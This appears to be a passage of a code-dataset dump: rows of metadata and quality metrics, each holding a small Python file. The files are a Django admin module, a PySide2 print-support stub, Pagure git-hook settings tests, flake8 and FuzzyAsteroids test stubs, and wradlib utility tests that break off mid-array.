| 18 | 33 | 0.746032 | 16 | 126 | 5.625 | 0.6875 | 0.244444 | 0.377778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15873 | 126 | 6 | 34 | 21 | 0.849057 | 0.222222 | 0 | 0 | 0 | 0 | 0.15625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a3dcbc99b1a76a14b9835bb6359467e644a9f15d | 181 | py | Python | troc/apps/record/admin.py | Windfarer/species2 | 15849c5805621410f3e8c26d27213f9bcf483fd1 | ["MIT"] | 1 | 2020-01-02T11:50:50.000Z | 2020-01-02T11:50:50.000Z | troc/apps/record/admin.py | Windfarer/species2 | 15849c5805621410f3e8c26d27213f9bcf483fd1 | ["MIT"] | 5 | 2019-12-15T07:43:46.000Z | 2022-02-26T17:47:26.000Z | troc/apps/record/admin.py | Windfarer/species2 | 15849c5805621410f3e8c26d27213f9bcf483fd1 | ["MIT"] | 1 | 2020-06-13T02:25:42.000Z | 2020-06-13T02:25:42.000Z | from django.contrib import admin
from .models import Record
# Register your models here.
class RecordAdmin(admin.ModelAdmin):
pass
admin.site.register(Record, RecordAdmin) | 22.625 | 40 | 0.779006 | 23 | 181 | 6.130435 | 0.652174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149171 | 181 | 8 | 40 | 22.625 | 0.915584 | 0.143646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
4a8d3a211d400db8f96b7a2f69e994de49f8be9f | 15,270 | py | Python | PySide2/QtPrintSupport.py | arjun-namdeo/py_stubs | 605bb167e239978f5417f3f1fc1f5c12e2a243cc | ["MIT"] | null | null | null | PySide2/QtPrintSupport.py | arjun-namdeo/py_stubs | 605bb167e239978f5417f3f1fc1f5c12e2a243cc | ["MIT"] | null | null | null | PySide2/QtPrintSupport.py | arjun-namdeo/py_stubs | 605bb167e239978f5417f3f1fc1f5c12e2a243cc | ["MIT"] | null | null | null | from PySide2.QtGui import QPagedPaintDevice as _QPagedPaintDevice
from PySide2.QtWidgets import QDialog as _QDialog
class _Object(object):
__dict__ = None
from . import QtWidgets as _QtWidgets
class QPrintPreviewWidget(_QtWidgets.QWidget):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def currentPage(*args, **kwargs):
pass
def fitInView(*args, **kwargs):
pass
def fitToWidth(*args, **kwargs):
pass
def orientation(*args, **kwargs):
pass
def pageCount(*args, **kwargs):
pass
def print_(*args, **kwargs):
pass
def setAllPagesViewMode(*args, **kwargs):
pass
def setCurrentPage(*args, **kwargs):
pass
def setFacingPagesViewMode(*args, **kwargs):
pass
def setLandscapeOrientation(*args, **kwargs):
pass
def setOrientation(*args, **kwargs):
pass
def setPortraitOrientation(*args, **kwargs):
pass
def setSinglePageViewMode(*args, **kwargs):
pass
def setViewMode(*args, **kwargs):
pass
def setVisible(*args, **kwargs):
pass
def setZoomFactor(*args, **kwargs):
pass
def setZoomMode(*args, **kwargs):
pass
def updatePreview(*args, **kwargs):
pass
def viewMode(*args, **kwargs):
pass
def zoomFactor(*args, **kwargs):
pass
def zoomIn(*args, **kwargs):
pass
def zoomMode(*args, **kwargs):
pass
def zoomOut(*args, **kwargs):
pass
AllPagesView = None
CustomZoom = None
FacingPagesView = None
FitInView = None
FitToWidth = None
SinglePageView = None
ViewMode = None
ZoomMode = None
__new__ = None
paintRequested = None
previewChanged = None
staticMetaObject = None
class QAbstractPrintDialog(_QDialog):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def addEnabledOption(*args, **kwargs):
pass
def enabledOptions(*args, **kwargs):
pass
def exec_(*args, **kwargs):
pass
def fromPage(*args, **kwargs):
pass
def isOptionEnabled(*args, **kwargs):
pass
def maxPage(*args, **kwargs):
pass
def minPage(*args, **kwargs):
pass
def printRange(*args, **kwargs):
pass
def printer(*args, **kwargs):
pass
def setEnabledOptions(*args, **kwargs):
pass
def setFromTo(*args, **kwargs):
pass
def setMinMax(*args, **kwargs):
pass
def setOptionTabs(*args, **kwargs):
pass
def setPrintRange(*args, **kwargs):
pass
def toPage(*args, **kwargs):
pass
AllPages = None
CurrentPage = None
DontUseSheet = None
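# "None" is a reserved word, so the generated stub injects that enum member through locals()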
locals()['None'] = None
PageRange = None
PrintCollateCopies = None
PrintCurrentPage = None
PrintDialogOption = None
PrintDialogOptions = None
PrintPageRange = None
PrintRange = None
PrintSelection = None
PrintShowPageSize = None
PrintToFile = None
Selection = None
__new__ = None
staticMetaObject = None
class QPageSetupDialog(_QDialog):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def done(*args, **kwargs):
pass
def exec_(*args, **kwargs):
pass
def open(*args, **kwargs):
pass
def printer(*args, **kwargs):
pass
def setVisible(*args, **kwargs):
pass
__new__ = None
staticMetaObject = None
class QPrintEngine(_Object):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def abort(*args, **kwargs):
pass
def metric(*args, **kwargs):
pass
def newPage(*args, **kwargs):
pass
def printerState(*args, **kwargs):
pass
def property(*args, **kwargs):
pass
def setProperty(*args, **kwargs):
pass
PPK_CollateCopies = None
PPK_ColorMode = None
PPK_CopyCount = None
PPK_Creator = None
PPK_CustomBase = None
PPK_CustomPaperSize = None
PPK_DocumentName = None
PPK_Duplex = None
PPK_FontEmbedding = None
PPK_FullPage = None
PPK_NumberOfCopies = None
PPK_Orientation = None
PPK_OutputFileName = None
PPK_PageMargins = None
PPK_PageOrder = None
PPK_PageRect = None
PPK_PageSize = None
PPK_PaperName = None
PPK_PaperRect = None
PPK_PaperSize = None
PPK_PaperSource = None
PPK_PaperSources = None
PPK_PrinterName = None
PPK_PrinterProgram = None
PPK_QPageLayout = None
PPK_QPageMargins = None
PPK_QPageSize = None
PPK_Resolution = None
PPK_SelectionOption = None
PPK_SupportedResolutions = None
PPK_SupportsMultipleCopies = None
PPK_WindowsPageSize = None
PrintEnginePropertyKey = None
__new__ = None
class QPrinter(_QPagedPaintDevice):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def abort(*args, **kwargs):
pass
def actualNumCopies(*args, **kwargs):
pass
def collateCopies(*args, **kwargs):
pass
def colorMode(*args, **kwargs):
pass
def copyCount(*args, **kwargs):
pass
def creator(*args, **kwargs):
pass
def devType(*args, **kwargs):
pass
def docName(*args, **kwargs):
pass
def doubleSidedPrinting(*args, **kwargs):
pass
def duplex(*args, **kwargs):
pass
def fontEmbeddingEnabled(*args, **kwargs):
pass
def fromPage(*args, **kwargs):
pass
def fullPage(*args, **kwargs):
pass
def getPageMargins(*args, **kwargs):
pass
def isValid(*args, **kwargs):
pass
def metric(*args, **kwargs):
pass
def newPage(*args, **kwargs):
pass
def numCopies(*args, **kwargs):
pass
def orientation(*args, **kwargs):
pass
def outputFileName(*args, **kwargs):
pass
def outputFormat(*args, **kwargs):
pass
def pageOrder(*args, **kwargs):
pass
def pageRect(*args, **kwargs):
pass
def pageSize(*args, **kwargs):
pass
def paintEngine(*args, **kwargs):
pass
def paperName(*args, **kwargs):
pass
def paperRect(*args, **kwargs):
pass
def paperSize(*args, **kwargs):
pass
def paperSource(*args, **kwargs):
pass
def printEngine(*args, **kwargs):
pass
def printProgram(*args, **kwargs):
pass
def printRange(*args, **kwargs):
pass
def printerName(*args, **kwargs):
pass
def printerState(*args, **kwargs):
pass
def resolution(*args, **kwargs):
pass
def setCollateCopies(*args, **kwargs):
pass
def setColorMode(*args, **kwargs):
pass
def setCopyCount(*args, **kwargs):
pass
def setCreator(*args, **kwargs):
pass
def setDocName(*args, **kwargs):
pass
def setDoubleSidedPrinting(*args, **kwargs):
pass
def setDuplex(*args, **kwargs):
pass
def setEngines(*args, **kwargs):
pass
def setFontEmbeddingEnabled(*args, **kwargs):
pass
def setFromTo(*args, **kwargs):
pass
def setFullPage(*args, **kwargs):
pass
def setMargins(*args, **kwargs):
pass
def setNumCopies(*args, **kwargs):
pass
def setOrientation(*args, **kwargs):
pass
def setOutputFileName(*args, **kwargs):
pass
def setOutputFormat(*args, **kwargs):
pass
def setPageMargins(*args, **kwargs):
pass
def setPageOrder(*args, **kwargs):
pass
def setPageSize(*args, **kwargs):
pass
def setPageSizeMM(*args, **kwargs):
pass
def setPaperName(*args, **kwargs):
pass
def setPaperSize(*args, **kwargs):
pass
def setPaperSource(*args, **kwargs):
pass
def setPrintProgram(*args, **kwargs):
pass
def setPrintRange(*args, **kwargs):
pass
def setPrinterName(*args, **kwargs):
pass
def setResolution(*args, **kwargs):
pass
def setWinPageSize(*args, **kwargs):
pass
def supportedResolutions(*args, **kwargs):
pass
def supportsMultipleCopies(*args, **kwargs):
pass
def toPage(*args, **kwargs):
pass
def winPageSize(*args, **kwargs):
pass
Aborted = None
Active = None
AllPages = None
Auto = None
Cassette = None
Cicero = None
Color = None
ColorMode = None
CurrentPage = None
CustomSource = None
DevicePixel = None
Didot = None
DuplexAuto = None
DuplexLongSide = None
DuplexMode = None
DuplexNone = None
DuplexShortSide = None
Envelope = None
EnvelopeManual = None
Error = None
FirstPageFirst = None
FormSource = None
GrayScale = None
HighResolution = None
Idle = None
Inch = None
Landscape = None
LargeCapacity = None
LargeFormat = None
LastPageFirst = None
LastPaperSource = None
Lower = None
Manual = None
MaxPageSource = None
Middle = None
Millimeter = None
NativeFormat = None
OnlyOne = None
Orientation = None
OutputFormat = None
PageOrder = None
PageRange = None
PaperSource = None
PdfFormat = None
Pica = None
Point = None
Portrait = None
PrintRange = None
PrinterMode = None
PrinterResolution = None
PrinterState = None
ScreenResolution = None
Selection = None
SmallFormat = None
Tractor = None
Unit = None
Upper = None
__new__ = None
class QPrinterInfo(_Object):
def __copy__(*args, **kwargs):
pass
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def __nonzero__(*args, **kwargs):
"""
x.__nonzero__() <==> x != 0
"""
pass
def defaultDuplexMode(*args, **kwargs):
pass
def description(*args, **kwargs):
pass
def isDefault(*args, **kwargs):
pass
def isNull(*args, **kwargs):
pass
def isRemote(*args, **kwargs):
pass
def location(*args, **kwargs):
pass
def makeAndModel(*args, **kwargs):
pass
def printerName(*args, **kwargs):
pass
def state(*args, **kwargs):
pass
def supportedDuplexModes(*args, **kwargs):
pass
def supportedPaperSizes(*args, **kwargs):
pass
def supportedResolutions(*args, **kwargs):
pass
def supportedSizesWithNames(*args, **kwargs):
pass
def supportsCustomPageSizes(*args, **kwargs):
pass
def availablePrinterNames(*args, **kwargs):
pass
def availablePrinters(*args, **kwargs):
pass
def defaultPrinter(*args, **kwargs):
pass
def defaultPrinterName(*args, **kwargs):
pass
def printerInfo(*args, **kwargs):
pass
__new__ = None
class QPrintPreviewDialog(_QDialog):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def done(*args, **kwargs):
pass
def open(*args, **kwargs):
pass
def printer(*args, **kwargs):
pass
def setVisible(*args, **kwargs):
pass
__new__ = None
paintRequested = None
staticMetaObject = None
class QPrintDialog(QAbstractPrintDialog):
def __init__(*args, **kwargs):
"""
x.__init__(...) initializes x; see help(type(x)) for signature
"""
pass
def done(*args, **kwargs):
pass
def exec_(*args, **kwargs):
pass
def open(*args, **kwargs):
pass
def options(*args, **kwargs):
pass
def setOption(*args, **kwargs):
pass
def setOptions(*args, **kwargs):
pass
def setVisible(*args, **kwargs):
pass
def testOption(*args, **kwargs):
pass
__new__ = None
accepted = None
staticMetaObject = None
| 14.231128 | 70 | 0.47387 | 1,211 | 15,270 | 5.843931 | 0.199835 | 0.221845 | 0.292779 | 0.336301 | 0.288258 | 0.274269 | 0.274269 | 0.274269 | 0.266215 | 0.137629 | 0 | 0.000347 | 0.433268 | 15,270 | 1,072 | 71 | 14.244403 | 0.817425 | 0.034774 | 0 | 0.507659 | 0 | 0 | 0.000275 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.343545 | false | 0.343545 | 0.006565 | 0 | 0.654267 | 0.028446 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
435ee3de7eabd596675a6ed4b873bc464a8e47df | 204 | py | Python | test/test_util.py | xfuzzycomp/FuzzyAsteroids | 636707499b4689bdecd8af32231c3ffd43f6583b | [
"MIT"
] | 1 | 2021-09-14T20:38:08.000Z | 2021-09-14T20:38:08.000Z | test/test_util.py | xfuzzycomp/FuzzyAsteroids | 636707499b4689bdecd8af32231c3ffd43f6583b | [
"MIT"
] | null | null | null | test/test_util.py | xfuzzycomp/FuzzyAsteroids | 636707499b4689bdecd8af32231c3ffd43f6583b | [
"MIT"
] | null | null | null | from unittest import TestCase
from src.fuzzy_asteroids.util import Scenario, Map, Score
class TestScenario(TestCase):
pass
class TestMap(TestCase):
pass
class TestScore(TestCase):
pass
| 12.75 | 57 | 0.75 | 25 | 204 | 6.08 | 0.64 | 0.236842 | 0.223684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186275 | 204 | 15 | 58 | 13.6 | 0.915663 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.375 | 0.25 | 0 | 0.625 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
4375f868c06e32bb5ba32f6d643002c6196d4fe1 | 8,287 | py | Python | src/tests/test_pagure_flask_ui_plugins_pagure_no_new_branch.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | src/tests/test_pagure_flask_ui_plugins_pagure_no_new_branch.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | src/tests/test_pagure_flask_ui_plugins_pagure_no_new_branch.py | yifengyou/learn-pagure | e54ba955368918c92ad2be6347b53bb2c24a228c | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
(c) 2015-2018 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <pingou@pingoured.fr>
"""
from __future__ import unicode_literals, absolute_import
import unittest
import shutil
import sys
import os
sys.path.insert(
0, os.path.join(os.path.dirname(os.path.abspath(__file__)), "..")
)
import tests
import pagure.config
class PagureFlaskPluginPagureNoNewBranchHooktests(tests.SimplePagureTest):
""" Tests for pagure_no_new_branches plugin of pagure """
def setUp(self):
""" Set up the environnment, ran before every tests. """
super(PagureFlaskPluginPagureNoNewBranchHooktests, self).setUp()
tests.create_projects(self.session)
tests.create_projects_git(os.path.join(self.path, "repos"))
pagure.config.config["GIT_FOLDER"] = os.path.join(self.path, "repos")
with tests.user_set(self.app.application, tests.FakeUser()):
self.csrf_token = self.get_csrf()
def test_plugin_pagure_ticket_no_data(self):
""" Test the pagure_ticket plugin on/off endpoint. """
user = tests.FakeUser(username="pingou")
with tests.user_set(self.app.application, user):
output = self.app.get(
"/test/settings/Prevent creating new branches by git push"
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Settings Prevent creating new branches by git "
"push - test - Pagure</title>",
output_text,
)
self.assertIn(
'<input class="form-check-input mt-2" id="active" name="active" '
'type="checkbox" value="y">',
output_text,
)
data = {}
output = self.app.post(
"/test/settings/Prevent creating new branches by git push",
data=data,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Settings Prevent creating new branches by git push "
"- test - Pagure</title>",
output_text,
)
self.assertIn(
'<input class="form-check-input mt-2" id="active" name="active" '
'type="checkbox" value="y">',
output_text,
)
def test_plugin_pagure_ticket_deactivate(self):
""" Test the pagure_ticket plugin on/off endpoint. """
user = tests.FakeUser(username="pingou")
with tests.user_set(self.app.application, user):
data = {"csrf_token": self.csrf_token}
output = self.app.post(
"/test/settings/Prevent creating new branches by git push",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
'<h5 class="pl-2 font-weight-bold text-muted">'
"Project Settings</h5>\n",
output_text,
)
self.assertIn(
"Hook Prevent creating new branches by git push deactivated",
output_text,
)
output = self.app.get(
"/test/settings/Prevent creating new branches by git push"
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Settings Prevent creating new branches by git push "
"- test - Pagure</title>",
output_text,
)
self.assertIn(
'<input class="form-check-input mt-2" id="active" name="active" '
'type="checkbox" value="y">',
output_text,
)
self.assertFalse(
os.path.exists(
os.path.join(
self.path,
"repos",
"test.git",
"hooks",
"post-receive.pagure",
)
)
)
def test_plugin_pagure_ticket_activate(self):
""" Test the pagure_ticket plugin on/off endpoint. """
user = tests.FakeUser(username="pingou")
with tests.user_set(self.app.application, user):
# Activate hook
data = {"csrf_token": self.csrf_token, "active": "y"}
output = self.app.post(
"/test/settings/Prevent creating new branches by git push",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
'<h5 class="pl-2 font-weight-bold text-muted">'
"Project Settings</h5>\n",
output_text,
)
self.assertIn(
"Hook Prevent creating new branches by git push activated",
output_text,
)
output = self.app.get(
"/test/settings/Prevent creating new branches by git push"
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Settings Prevent creating new branches by git push "
"- test - Pagure</title>",
output_text,
)
self.assertIn(
'<input checked class="form-check-input mt-2" id="active" name="active" '
'type="checkbox" value="y">',
output_text,
)
# De-Activate hook
data = {"csrf_token": self.csrf_token}
output = self.app.post(
"/test/settings/Prevent creating new branches by git push",
data=data,
follow_redirects=True,
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
'<h5 class="pl-2 font-weight-bold text-muted">'
"Project Settings</h5>\n",
output_text,
)
self.assertIn(
"Hook Prevent creating new branches by git push deactivated",
output_text,
)
output = self.app.get(
"/test/settings/Prevent creating new branches by git push"
)
self.assertEqual(output.status_code, 200)
output_text = output.get_data(as_text=True)
self.assertIn(
"<title>Settings Prevent creating new branches by git push "
"- test - Pagure</title>",
output_text,
)
self.assertIn(
'<input class="form-check-input mt-2" id="active" name="active" '
'type="checkbox" value="y">',
output_text,
)
self.assertFalse(
os.path.exists(
os.path.join(
self.path,
"repos",
"test.git",
"hooks",
"pre-receive.pagure_no_new_branches",
)
)
)
def test_plugin_pagure_ticket_activate_w_no_repo(self):
""" Test the pagure_ticket plugin on/off endpoint. """
shutil.rmtree(os.path.join(self.path, "repos", "test.git"))
user = tests.FakeUser(username="pingou")
with tests.user_set(self.app.application, user):
# Try re-activate hook w/o the git repo
data = {"csrf_token": self.csrf_token, "active": "y"}
output = self.app.post(
"/test/settings/Prevent creating new branches by git push",
data=data,
)
self.assertEqual(output.status_code, 404)
if __name__ == "__main__":
unittest.main(verbosity=2)
| 34.67364 | 89 | 0.520574 | 853 | 8,287 | 4.917937 | 0.161782 | 0.057211 | 0.072944 | 0.105364 | 0.821454 | 0.809535 | 0.782837 | 0.774732 | 0.761859 | 0.751847 | 0 | 0.010054 | 0.37589 | 8,287 | 238 | 90 | 34.819328 | 0.801044 | 0.057319 | 0 | 0.661376 | 0 | 0.026455 | 0.250999 | 0.044711 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.026455 | false | 0 | 0.037037 | 0 | 0.068783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
43834bd884389f915826d3e274660ff0074add70 | 340 | py | Python | tests/test_integration/test_xfail_reason.py | lowitea/flake8-fine-pytest | 5f5b6a98abbc98e5a74c4ac8bd03890332828070 | [
"MIT"
] | null | null | null | tests/test_integration/test_xfail_reason.py | lowitea/flake8-fine-pytest | 5f5b6a98abbc98e5a74c4ac8bd03890332828070 | [
"MIT"
] | null | null | null | tests/test_integration/test_xfail_reason.py | lowitea/flake8-fine-pytest | 5f5b6a98abbc98e5a74c4ac8bd03890332828070 | [
"MIT"
] | null | null | null | def test_xfail_with_no_reason(run_validator_for_test_files):
errors = run_validator_for_test_files('xfailed_test_with_no_reason.py')
assert len(errors) == 1
def test_xfail_with_empty_reason(run_validator_for_test_files):
errors = run_validator_for_test_files('xfailed_test_with_empty_reason.py')
assert len(errors) == 1
| 30.909091 | 78 | 0.811765 | 54 | 340 | 4.518519 | 0.314815 | 0.196721 | 0.245902 | 0.311475 | 0.811475 | 0.811475 | 0.614754 | 0.614754 | 0.614754 | 0.614754 | 0 | 0.006623 | 0.111765 | 340 | 10 | 79 | 34 | 0.801325 | 0 | 0 | 0.333333 | 0 | 0 | 0.185294 | 0.185294 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
438e6b747b70cef1378c3dd7aed9fc55a98a296b | 14,801 | py | Python | wradlib/tests/test_util.py | egouden/wradlib | daac35ff24c774183ca0fa63f28a85fb1e4c84f2 | [
"MIT"
] | 1 | 2020-11-16T14:24:15.000Z | 2020-11-16T14:24:15.000Z | wradlib/tests/test_util.py | egouden/wradlib | daac35ff24c774183ca0fa63f28a85fb1e4c84f2 | [
"MIT"
] | null | null | null | wradlib/tests/test_util.py | egouden/wradlib | daac35ff24c774183ca0fa63f28a85fb1e4c84f2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2011-2020, wradlib developers.
# Distributed under the MIT License. See LICENSE.txt for more info.
import datetime as dt
import os
import deprecation
import numpy as np
import pytest
from wradlib import util
from . import requires_data
class TestHelperFunctions:
def test__shape_to_size(self):
assert util._shape_to_size((10, 10, 10)) == 10 * 10 * 10
def test__idvalid(self):
data = np.array(
[np.inf, np.nan, -99.0, 99, -9999.0, -9999, -10.0, -5.0, 0.0, 5.0, 10.0]
)
assert np.allclose(util._idvalid(data), np.array([6, 7, 8, 9, 10]))
assert np.allclose(
util._idvalid(data, minval=-5.0, maxval=5.0), np.array([7, 8, 9])
)
assert np.allclose(
util._idvalid(data, isinvalid=[-9999], maxval=5.0),
np.array([2, 6, 7, 8, 9]),
)
def test_issequence(self):
assert util.issequence([0, 1, 2])
assert not util.issequence(1)
assert not util.issequence("str")
def test_trapezoid(self):
data = np.arange(0.0, 30.1, 0.1)
correct = np.arange(0.0, 1.0, 0.01)
correct = np.concatenate((correct, np.ones(101), correct[::-1]))
result = util.trapezoid(data, 0.0, 10.0, 20.0, 30.0)
np.testing.assert_array_almost_equal(result, correct, decimal=9)
def test_prob_round(self):
np.random.seed(42)
np.testing.assert_equal(42.0, util.prob_round(42.4242))
np.random.seed(44)
np.testing.assert_equal(43.0, util.prob_round(42.4242))
def test_get_wradlib_data_path(self):
wrl_data_path = os.environ.get("WRADLIB_DATA", None)
del os.environ["WRADLIB_DATA"]
with pytest.raises(EnvironmentError):
util.get_wradlib_data_path()
if wrl_data_path is not None:
os.environ["WRADLIB_DATA"] = wrl_data_path
@requires_data
def test_get_wradlib_data_path_requires(self):
filename = os.path.join(util.get_wradlib_data_path(), "test.dat")
with pytest.raises(EnvironmentError):
util.get_wradlib_data_file(filename)
def test_from_to(self):
out = util.from_to("2000-01-01 00:00:00", "2000-01-02 00:00:00", 86400)
shouldbe = [dt.datetime(2000, 1, 1, 0, 0), dt.datetime(2000, 1, 2, 0, 0)]
assert out == shouldbe
def test_calculate_polynomial(self):
data = np.arange(0, 10, 1)
w = np.arange(0, 5, 1)
out = np.array([0, 10, 98, 426, 1252, 2930, 5910, 10738, 18056, 28602])
poly = util.calculate_polynomial(data, w)
np.testing.assert_allclose(poly, out, rtol=1e-12)
def test_import_optional(self):
m = util.import_optional("math")
np.testing.assert_equal(m.log10(100), 2.0)
mod = util.import_optional("h8x")
with pytest.raises(AttributeError):
mod.test()
@requires_data
@deprecation.fail_if_not_removed
def test_maximum_intensity_projection(self):
angle = 0.0
elev = 0.0
filename = util.get_wradlib_data_file("misc/polar_dBZ_tur.gz")
data = np.loadtxt(filename)
# we need to have meter here for the georef function inside mip
d1 = np.arange(data.shape[1], dtype=np.float64) * 1000
d2 = np.arange(data.shape[0], dtype=np.float64)
data = np.roll(data, (d2 >= angle).nonzero()[0][0], axis=0)
# calculate max intensity proj
util.maximum_intensity_projection(data, r=d1, az=d2, angle=angle, elev=elev)
util.maximum_intensity_projection(data, autoext=False)
@requires_data
def test_roll2d_polar(self):
filename = util.get_wradlib_data_file("misc/polar_dBZ_tur.gz")
data = np.loadtxt(filename)
result1 = util.roll2d_polar(data, 1, axis=0)
result2 = util.roll2d_polar(data, -1, axis=0)
result3 = util.roll2d_polar(data, 1, axis=1)
result4 = util.roll2d_polar(data, -1, axis=1)
np.testing.assert_equal(result1, np.roll(data, 1, axis=0))
np.testing.assert_equal(result2, np.roll(data, -1, axis=0))
np.testing.assert_equal(result3[:, 1:], np.roll(data, 1, axis=1)[:, 1:])
np.testing.assert_equal(result4[:, :-1], np.roll(data, -1, axis=1)[:, :-1])
def test_medfilt_along_axis(self):
x = np.arange(10).reshape((2, 5)).astype("f4")
shouldbe = np.array([[0.0, 1.0, 2.0, 3.0, 3.0], [5.0, 6.0, 7.0, 8.0, 8.0]])
result = util.medfilt_along_axis(x, 3)
np.testing.assert_allclose(result, shouldbe)
def test_gradient_along_axis(self):
x = np.arange(10).reshape((2, 5)).astype("f4") ** 2
result = util.gradient_along_axis(x)
shouldbe = np.array([[1.0, 2.0, 4.0, 6.0, 7.0], [11.0, 12.0, 14.0, 16.0, 17.0]])
np.testing.assert_allclose(result, shouldbe)
def test_gradient_from_smoothed(self):
x = np.arange(10).reshape((2, 5)).astype("f4") ** 2
result = util.gradient_from_smoothed(x)
shouldbe = np.array([[1.0, 2.0, 1.5, 0.0, 0.0], [11.0, 12.0, 6.5, 0.0, 0.0]])
np.testing.assert_allclose(result, shouldbe)
class TestUtil:
img = np.zeros((36, 10), dtype=np.float64)
img[2, 2] = 1 # isolated pixel
img[5, 6:8] = 1 # line
img[20, :] = 1 # spike
img[9:12, 4:7] = 1 # precip field
# img[15:17,5:7] = np.nan # nodata as nans
def test_filter_window_polar(self):
np.random.seed(42)
rscale = 250
# nrays, nbins = self.img.shape
# ascale = 2 * np.pi / self.img.shape[0]
mean = util.filter_window_polar(self.img.copy(), 300, "maximum", rscale)
mean2 = util.filter_window_polar(
self.img.copy(), 300, "maximum", rscale, random=True
)
correct = np.array(
[
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[0.0, 1.0, 1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[1.0, 1.0, 0.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0],
[1.0, 1.0, 0.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 1.0, 1.0, 1.0, 1.0, 0.0, 0.0],
